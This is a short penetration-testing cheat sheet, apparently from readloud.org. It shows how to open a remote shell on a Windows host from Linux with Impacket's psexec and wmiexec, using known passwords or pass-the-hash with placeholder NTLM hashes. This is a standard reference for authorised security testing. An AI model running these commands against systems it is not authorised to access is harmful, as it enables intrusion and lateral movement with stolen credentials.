Login Windows Shell - readloud.org

If we have credentials for target Windows system, we can execute commands from Linux machine.

Impacket PsExec

PsExec gives us an interactive shell on the Windows host.

impacket-psexec username:password@<target-ip>
# Pass the Hashes
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1

Impacket WmiExec

WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hashes
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1